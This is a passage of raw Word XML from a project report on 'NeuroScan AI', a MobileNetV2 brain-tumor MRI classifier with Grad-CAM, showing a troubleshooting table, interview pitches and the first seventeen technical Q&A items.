tensor`</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GPU or CPU RAM exhausted during batch generation or model training.</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Check memory usage in Task Manager.</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Reduce `BATCH_SIZE` from 32 to 16, or close memory-heavy applications.</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r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Streamlit web page displays a blank screen or loops indefinitely</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Browser cache holds stale JavaScript chunks from a previous Streamlit version.</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Open Developer Tools (F12) -&gt; Console.</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t>Perform a hard refresh: `Ctrl + F5` or open in an Incognito / Private window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>`IndexError: list index out of range` in `base_model` lookup</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Layer name searching for `"mobilenet"` did not match any layer in the outer model.</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Print `[l.name for l in model.layers]` to inspect actual layer names.</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t>Check layer naming convention and ensure model was instantiated from MobileNetV2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pP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14: Project Interview Preparation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>14.1 Elevator Pitches for Interviews</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The 30-Second Elevator Pitch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*"I built **NeuroScan AI**, an end-to-end medical deep learning system for four-class brain tumor diagnosis from MRI scans. Using transfer learning on MobileNetV2, I trained a model that achieved **86.12% test accuracy** across 1,600 unseen scans, with **99.0% recall** on healthy brain scans. Because clinical AI cannot be a black box, I implemented a mathematical **Grad-CAM engine** that backpropagates gradients to highlight the exact tumor site in real time, serving the entire system through an interactive Streamlit diagnostic dashboard."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The 2-Minute Project Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*"In clinical radiology, diagnosing intracranial tumors—gliomas, meningiomas, and pituitary adenomas—is time-critical, yet traditional AI models face deep skepticism because they are opaque black boxes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>To solve this, I designed **NeuroScan AI**. I began with an exploratory data audit of 7,200 cranial MRI scans, using MD5 cryptographic hashing to mathematically prove zero data leakage between training and testing splits. I built an optimized `tf.data` pipeline incorporating anatomically safe augmentations like subtle rotations and horizontal flips.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>For the model, I leveraged MobileNetV2 pre-trained on ImageNet. Its depthwise separable convolutions reduced computational complexity by roughly 8x compared to standard CNNs, allowing sub-second CPU inference. I froze the base feature extractor and designed a custom classification head using Global Average Pooling, Batch Normalization, and Dropout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>During development, I tested an engineering hypothesis: retraining on 100% of the training data (5,600 images) boosted test accuracy from an 82.19% baseline to **86.12%**, surging meningioma sensitivity from 63.5% to 78.5%.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>To provide clinical transparency, I implemented a custom Grad-CAM module using TensorFlow's `GradientTape` to compute gradients of the winning class score with respect to the final convolutional feature maps, creating an alpha-blended thermal overlay. Finally, I deployed the application via a Streamlit dashboard with in-memory model caching, providing doctors with instant classifications, probability distributions, and visual saliency maps."*</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14.2 Forty Project-Specific Interview Questions and Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Beginner Questions (1–10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. What does NeuroScan AI do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>It classifies cranial MRI scans into four categories (Glioma, Meningioma, Pituitary tumor, or Healthy Brain) and highlights the physical location of the tumor using a Grad-CAM thermal heatmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. What programming language and deep learning library did you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Python 3.11 with TensorFlow and Keras, alongside OpenCV, NumPy, Scikit-learn, and Streamlit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. What are the four classes in your dataset?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>glioma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (intra-axial glial tumor), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>meningioma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (extra-axial dural tumor), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pituitary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sellar adenoma), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notumor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (normal healthy brain).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. What is an MRI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Magnetic Resonance Imaging: a medical imaging modality using strong magnetic fields and radio waves to produce high-contrast cross-sectional images of soft tissue like the brain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. What input size does your model expect?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$224 </w:t>
        <w:tab/>
        <w:t>imes 224$ pixels with 3 color channels (RGB).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6. Why do we resize images to 224x224?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The pre-trained MobileNetV2 architecture expects fixed dimensions ($224 </w:t>
        <w:tab/>
        <w:t>imes 224$). Our raw dataset contained 447 unique resolutions; standardizing them allows batch tensor processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>7. What is transfer learning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Taking a neural network pre-trained on a massive generic dataset (ImageNet with 1.4 million images) and repurposing its learned feature extractors for a specialized target domain (brain tumor MRIs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>8. What is the difference between training data and testing data?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Training data (5,600 images) is used by the optimizer to adjust model weights. Testing data (1,600 images) is kept completely untouched to measure real-world performance on unseen data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>9. What is accuracy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The ratio of correct predictions to total predictions: $\frac{</w:t>
        <w:tab/>
        <w:t>ext{Correct}}{</w:t>
        <w:tab/>
        <w:t>ext{Total}}$. Our model achieved 86.12% overall test accuracy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>10. Why is accuracy alone not enough in medical imaging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Because missing a tumor (a False Negative) is life-threatening, while a false alarm (False Positive) merely triggers a follow-up scan. We must examine Recall and Confusion Matrices.</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Intermediate Questions (11–25)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>11. What is MobileNetV2?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>An efficient convolutional neural network architecture designed by Google that uses Inverted Residual blocks with linear bottlenecks and Depthwise Separable Convolutions to drastically reduce computational operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>12. How does Depthwise Separable Convolution work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>It splits standard convolution into:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Depthwise convolution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Applies a single spatial filter per channel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pointwise convolution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Applies a $1 </w:t>
        <w:tab/>
        <w:t>imes 1$ convolution to mix channels. This reduces computation by roughly 8 to 9 times.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>13. Why did you freeze the base model during initial training?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">To prevent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Catastrophic Forgetting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>. The randomly initialized dense head generates chaotic gradients in early epochs that would destroy pre-trained ImageNet filters if allowed to backpropagate into the base.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>14. What is Global Average Pooling 2D (GAP)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">It averages all spatial pixels in each feature map: a $(7 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 7 </w:t>
        <w:tab/>
        <w:t>imes 1280)$ tensor becomes a flat vector of $(1280)$. It eliminates millions of dense weights compared to a Flatten layer, preventing overfitting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>15. Why did you include Batch Normalization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>It normalizes neuron activations by subtracting batch mean and dividing by batch standard deviation. This stabilizes training, mitigates internal covariate shift, and acts as a mild regularizer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>16. What is Dropout, and what rates did you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Dropout randomly sets a fraction of neuron activations to zero during training to prevent co-adaptation. We used 30% (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) after GAP and 20% (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) after the Dense(128) layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>17. What loss function did you use, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Categorical Cross-Entropy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
